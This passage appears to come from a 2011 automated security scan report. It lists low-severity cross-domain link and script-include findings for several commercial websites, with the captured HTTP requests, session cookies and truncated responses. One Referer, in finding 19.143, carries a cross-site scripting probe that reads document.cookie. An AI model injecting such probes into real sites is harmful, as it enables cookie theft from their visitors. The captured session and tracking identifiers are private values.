<div style="float:left;width:128px"><a href="http://msn.careerbuilder.com/Article/MSN-2561-Career-Growth-and-Change-Should-you-accept-that-job-offer/?SiteId=cbmsnjm42561&amp;sc_extcmp=JS_2561_jobmod"><img class="landscape" src="http://col.stb.s-msn.com/i/54/CE344AC4F6E4ABA411D9B1B0A5B3C.jpg" title="Image: Tiny man figurine &amp; 'Yes/No' cube (.. RUNSTUDIO/Getty Images)" width="128" height="73" alt="Image: Tiny man figurine &amp; 'Yes/No' cube (.. RUNSTUDIO/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://msn.careerbuilder.com/Article/MSN-2561-Career-Growth-and-Change-Should-you-accept-that-job-offer/?SiteId=cbmsnjm42561&amp;sc_extcmp=JS_2561_jobmod"><strong>
...[SNIP]...
<p>Tips to make a <a href="http://msn.careerbuilder.com/Article/MSN-2561-Career-Growth-and-Change-Should-you-accept-that-job-offer/?SiteId=cbmsnjm42561&amp;sc_extcmp=JS_2561_jobmod">confident &amp; informed decision</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2205-Job-Info-and-Trends-30-Jobs-that-Earn-30-an-Hour/?SiteId=cbmsnjm42205&amp;sc_extcmp=JS_2205_jobmod">30 jobs that earn $30 an hour</a>
...[SNIP]...
<li class="ter"><a href="http://www.theworkbuzz.com/interviews/7-secrets-for-a-smarter-job-search/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers">7 secrets for a smarter job search</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2553-Cover-Letters-Resumes-Your-work-history-How-far-back-should-you-go-on-a-r..sum../?SiteId=cbmsnjm42553&amp;sc_extcmp=JS_2553_jobmod">How far back should you go on a r..sum..?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/custom/msn/postresume.aspx?siteid=cbmsnjmPR">Post your r..sum.. for easier job hunting</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2369-Salaries-and-Promotions-What-Happens-if-I-Embellish-My-Salary-History/?SiteId=cbmsnjm42369&amp;sc_extcmp=JS_2369_jobmod">What if I embellish my salary history?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&amp;form=ap&amp;gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&amp;form=ap&amp;gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&amp;form=ap&amp;gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Hotels+with+a+Jaw-Dropping+View%3a+Lake+Louise%2c+Alberta&amp;cid=msntab1183787&amp;form=HPTRAV"><img class="landscape" src="http://col.stb.s-msn.com/i/7D/93CDE8746BED3770EAD59B9E42AC2E.jpg" title="Image: View from rooftop deck, Inn at the Market, Seattle (.. Mark Bauschke/Courtesy of Inn at the Market)" width="128" height="73" alt="Image: View from rooftop deck, Inn at the Market, Seattle (.. Mark Bauschke/Courtesy of Inn at the Market)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Hotels+with+a+Jaw-Dropping+View%3a+Lake+Louise%2c+Alberta&amp;cid=msntab1183787&amp;form=HPTRAV"><strong>
...[SNIP]...
<p>Beautiful places where the <a href="http://www.bing.com/travel/content/search?q=Hotels+with+a+Jaw-Dropping+View%3a+Lake+Louise%2c+Alberta&amp;cid=msntab1183787&amp;form=HPTRAV">vista is the main attraction</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=When+is+an+Airplane+Too+Old+to+Fly%3f&amp;cid=msntab1183872&amp;FORM=HPTRAV">When is an airplane too old to fly? </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Rain+Forest+Adventures%3a+Borneo&amp;cid=msntab1182776&amp;FORM=HPTRAV">Monkeys, lemurs &amp; bears, oh, my! 12 rain forest trips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Top+Natural+Wonders+for+Kids%3a+Yellowstone+National+Park&amp;cid=msntab1150443&amp;form=HPTRAV">Top natural wonders that'll impress your kids</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Around+the+World+in+40+Days%3a+The+Project&amp;cid=msntab1184049&amp;FORM=HPTRAV">Travel around the world in 40 days</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/ext/search/air?e=LAS&amp;dow=5&amp;dur=2&amp;wo=0&amp;FORM=TRMSN1">Last-minute flights to Vegas this weekend</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotel/hotelValidate?e=LOS_ANGELES_CA_US&amp;dow=7&amp;dur=7&amp;wo=4&amp;FORM=TRMSN1">Spend a week in Los Angeles next month</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/ext/search/air?e=NYC&amp;dow=6&amp;dur=7&amp;wo=4&amp;FORM=TRMSN1">Fly to New York next month</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&amp;form=trvcon">Find deals on airfares from your city</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&amp;FORM=Z9LH9#">Bing Maps: Explore a new destination</a>
...[SNIP]...
<div style="width: 75px;"><a href="http://msn.careerbuilder.com/Article/MSN-2348-Job-Search-10-Ways-to-Score-That-Job-Offer/?SiteId=cbmsnsl42348&amp;sc_extcmp=JS_2348_spotlight&amp;gt1=23000"><img src="http://col.stb.s-msn.com/i/2A/5B8A72559FFD53A5326CBA63ACC995.jpg" title="Image: Businessmen in meeting (.. Supernova/Getty Images)" width="75" height="128" alt="Image: Businessmen in meeting (.. Supernova/Getty Images)" /></a>
...[SNIP]...
<li class="first"><a href="http://msn.careerbuilder.com/Article/MSN-2348-Job-Search-10-Ways-to-Score-That-Job-Offer/?SiteId=cbmsnsl42348&amp;sc_extcmp=JS_2348_spotlight&amp;gt1=23000">10 ways to score that job offer</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/Article/MSN-2245-Job-Search-6-Ways-to-Job-Search-Smarter-Not-Harder/?SiteId=cbmsnsl42245&amp;sc_extcmp=JS_2245_spotlight&amp;gt1=23000">Job search made smarter, not harder </a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/Article/MSN-2560-Job-Search-Sell-yourself-How-your-job-search-is-like-running-a-business/?SiteId=cbmsnsl42560&amp;sc_extcmp=JS_2560_spotlight&amp;gt1=23000">Run your job search like a business</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/Article/MSN-2418-Job-Search-Does-Persistence-Really-Pay/?SiteId=cbmsnsl42418&amp;sc_extcmp=JS_2418_spotlight&amp;gt1=23000">Does persistence really pay off?</a>
...[SNIP]...
<li class="last"><a href="http://msn.careerbuilder.com/Article/MSN-2425-Job-Search-Im-Experiencing-Job-Search-Burnout/?SiteId=cbmsnsl42425&amp;sc_extcmp=JS_2425_spoptlight&amp;gt1=23000">How to handle job-search burnout</a>
...[SNIP]...
<div class="actions"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303842939&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http:%2F%2Fwww.msn.com%2F%3Feuid%3DB506C07761D7465D924574124E3C14DF%26userGroup%3DW:default%26PM%3Dz:1&amp;lc=1033&amp;id=1184" class="dMSNME_1">Sign in</a>
...[SNIP]...
<a href="http://g.msn.com/AIPRIV/en-us" class="adch"><img src="http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif" alt="Ad Choice" title="Ad Choice" height="12" width="68" /></a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

19.138. http://www.msn.com/sck.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msn.com
Path:   /sck.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /sck.aspx?cv=_SS%3dSID%3dBADDC820B268422C99FA89F5582D20C7%3b&h=36aef2a7-994a-6863-3092-2a28e086b0e4 HTTP/1.1
Host: www.msn.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/sck?cn=_SS&r=http://www.msn.com/sck.aspx&h=36aef2a7-994a-6863-3092-2a28e086b0e4
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=40II8A39_0214:WP10_5|; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:35:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA36
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 2568
Content-Length: 2568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...
<meta name="msapplication-task" content="name=Lifestyle;action-uri=http://lifestyle.msn.com/?OCID=MSNIE9Jumplist;icon-uri=http://col.stc.s-msn.com/br/gbl/lg/csl/favicon.ico" /><link rel="SHORTCUT ICON" href="http://col.stc.s-msn.com/br/gbl/lg/csl/favicon.ico" type="image/x-icon" /><meta http-equiv="pics-label" content="(pics-1.1 &quot;http://www.icra.org/ratingsv02.html&quot; comment &quot;Single file v2.0&quot; l gen true for &quot;http://www.msn.com&quot; r (nz 1 vz 1 lz 1 oz
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/1c/4a0253de6eac448d8f2c39c53f8926.js" xmlns="http://www.w3.org/1999/xhtml"></script>
...[SNIP]...

19.139. http://www.omniture.com/modules/creative_zones/display.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /modules/creative_zones/display.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /modules/creative_zones/display.html?sid=lead_form_privacy_include&lang_id=1 HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/offer/943?s_osc=30199
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271424|check#true#1303852284|session#1303852218540-851916#1303854084

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 01:10:13 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Tue, 27 Oct 2009 03:24:30 GMT
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:10:13 GMT
Connection: close
Content-Length: 991

document.write('<div id=\'izone_731\'><p style="text-align:left;" class="fineprint">Notice: By supplying my contact information, I authorize Omniture, An Adobe company (Omniture), and its agents ("Omn
...[SNIP]...
</a> and <a href="http://www.adobe.com/misc/privacy.html" target="blank">Adobe Privacy Policy</a>
...[SNIP]...

19.140. http://www.omniture.com/offer/943  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /offer/943

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /offer/943?s_osc=30199 HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; mbox=PC#1303601743323-887111.17#1306269330|check#true#1303850212|session#1303850129880-628856#1303851990|signal-click#productpage_feature-clicked%26mboxTarget%3D34394.4497#1303854916; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:15:48 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Tue, 26 Apr 2011 21:15:48 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:15:48 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:15:48 GMT; path=/; domain=omniture.com
Content-Length: 14317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Which Promotions Do Your Custom
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />
   
   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...
<!-- SiteCatalyst code version: H.20.3.-->
           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           <!-- End SiteCatalyst code version: H.20.3. -->
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

19.141. http://www.randomhouse.com/about/faq/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.randomhouse.com
Path:   /about/faq/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /about/faq/index.php?ToDo=contact HTTP/1.1
Host: www.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/about/contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; mbox=session#1303855598284-166145#1303858226|PC#1303855598284-166145#1366928366|check#true#1303856426; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; SC_LINKS=about%3Acontact.html%3A%3A%5E%5Ee-mail%20Customer%20Service%5E%5Eabout%3Acontact.html%3A%3A%20%7C%20e-mail%20Customer%20Service%5E%5E; s_sq=ranhrollup%3D%2526pid%253Dabout%25253Acontact.html%25253A%25253A%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.randomhouse.com%25252Fabout%25252Ffaq%25252Findex.php%25253FToDo%25253Dcontact%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:40:30 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.6 mod_fastcgi/2.4.6 mod_perl/2.0.4 Perl/v5.8.7
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Content-Length: 15225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <script src="/art/bw06/r
...[SNIP]...
<div id="rhbw_ecom">
                       
                       <a href="http://twitter.com/randomhouse"><img src="/art/bw06/base/follow-us-on-twitter.png" width="112" height="37" alt="Follow Us On Twitter" /></a><a href="http://www.facebook.com/RandomHouseInc"><img src="/art/bw06/base/fan-us-on-facebook.png" width="103" height="37" alt="Fan Us On Facebook" />
...[SNIP]...
<span class="KB_Brand">Powered by <a class="KB_LinkSmall1" href="http://www.activekb.com/" target="_blank">ActiveKB Knowledgebase Software</a>
...[SNIP]...
<li><a href="http://www.rhspeakers.com/">Random House Speakers Bureau</a>
...[SNIP]...
<li><a href="http://www.booksequalgifts.com/">Gift Ideas</a>
...[SNIP]...
<br />
                   <a href="http://www.bertelsmann.com/"><img src="/art/bw06/base/foot_logo_bmg.png" alt="Bertelsmann Media Worldwide" style="float:right;" />
...[SNIP]...
<!-- Resonance -->    <img src="http://c7.zedo.com/img/bh.gif?n=162&g=20&a=313&s=1&l=1&t=r" width="1" height="1" border="0" >

<!-- Start Quantcast Tag -->
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
<noscript>
<img src="//secure.quantserve.com/pixel/p-c49Y5WdLV8kPg.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://code.randomhouse.com/b/ss/ranhrollup/1/H.17--NS/0"
height="1" width="1" border="0" alt="" />
...[SNIP]...

19.142. http://www.realtor.com/search/widgetportal/Widget.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realtor.com
Path:   /search/widgetportal/Widget.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207 HTTP/1.1
Host: www.realtor.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:46:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=02cqtyvthyh3kbzxkedpaqwg; path=/; HttpOnly
Set-Cookie: SAVEDITEMS=; domain=realtor.com; expires=Mon, 25-Apr-2011 18:46:19 GMT; path=/
Set-Cookie: criteria=sby=3&loc=75207&usrloc=75207&typ=3&status=1; domain=realtor.com; path=/
Set-Cookie: recAlertSearch=recAlertShown=false&sameSrch=false&saveLstCnt=0&sid=; domain=realtor.com; path=/
Set-Cookie: RecentSearch=loc%3dNew+York%2c+NY%26typ%3d3%26mnp%3d%26mxp%3d%26bd%3d0%26bth%3d0%26status%3d1; domain=realtor.com; expires=Thu, 26-Apr-2012 18:46:19 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 69807
Content-Length: 69807


<!DOCTYPE html>
<!--[if gte IE 8]><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="IE IE8 IE6+ IE7+ IE8+ IE8-"><![endif]-->
<!--[if IE 7]><html xmlns="http://www.w3.org/19
...[SNIP]...
<link type="image/x-icon" href="/favicon.ico" rel="shortcut icon" />
<link type="text/css" rel="stylesheet" href="http://static.move.com/lib/rdc/6.0.10_P1A//mainsearchxslcontainer.css"></link>
...[SNIP]...
<div class="thumbnail" style="display:none;"><img src="http://p.rdcpix.com/v03/l59eaec42-c0l.jpg"></div><div class="thumbnail" style="display:none;"><img src="http://p.rdcpix.com/v01/lc8dc8942-c0l.jpg"></div>
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.move.com/lib/rdc/6.0.10_P1A/common.js'></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://static.move.com/rdc/v6/fah/js/nc/s_code_RDC_FAH04.js"></script>
...[SNIP]...
<!-- End SiteCatalyst code version: H.2. -->


<script type='text/javascript' src='http://mdctrail.com/mvTracker.ashx?redux_v2'></script>
<script type='text/javascript' src='http://static.move.com/lib/rdc/6.0.10_P1A//mainsearchxslcontainer.js'></script>
...[SNIP]...
<div id="dRegPrivacyPolicy">
<a href="http://www.move.com/company/privacy.aspx" rel="nofollow" tabindex="10" id="aPrivacyPolicy" target="_blank">
Privacy Policy</a> | <a href="http://www.move.com/company/terms.aspx" rel="nofollow" tabindex="11"
id="aTerms" target="_blank">
Terms of Use</a>
...[SNIP]...
<div id="FP_popWrap">
           <img src="http://static.move.com/Common/img/check-big.gif" />
           <div class="FP_confirmThanks">
...[SNIP]...
<div class="mvErrMsg01">
<img class="mvErrIcn" src="http://static.move.com/common/img/clear.gif"
alt="" />

<span id="sRegErrs">
...[SNIP]...
<div id="dAjaxLoader">
<img alt="" src="http://static.move.com/common/img/ajaxblueloader.gif" />
<span>
...[SNIP]...
</body><img src="http://c.homestore.com/srv/oreo?c.realtor.com" style="border-width:0px;height:1px;width:1px;" />
</html>
...[SNIP]...

19.143. http://www.res-x.com/%22http://www.randomhouse.com/images/dyn/cover/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /%22http://www.randomhouse.com/images/dyn/cover/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /%22http://www.randomhouse.com/images/dyn/cover/?source=9780739372494&height=100&maxwidth=100&alternate=/images/dyn/cover/no_cover_50.gif;\%22 HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.res-x.com/ws/r2/Resonance.aspx?appid=randomhouse01&tk=686529694590717&ss=212207240983843&sg=1&pg=447216360829770&bx=true&vr=2.69&sc=cart_rr&ev=cart+display&ei=&ct=randomhousec01&no=4&cb=r1eh783b4%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1d40facd3aa&clk=&ur=http%3A//ecommerce.randomhouse.com/cart.do%3Ffrom%3Drandomhouse&plk=&rf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2lhrgq454mpusu55p4rq3yzw; NSC_wjq-Hspvq4=ffffffffc3a01e5245525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 23:24:41 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a>
...[SNIP]...

20. Cross-domain script include  previous  next
There are 91 instances of this issue:


20.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.14

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:39:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7009

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Thu Apr 21 18:16:05 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

20.2. http://ad.doubleclick.net/adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21

Issue detail

The response dynamically includes the following scripts from other domains:

Request

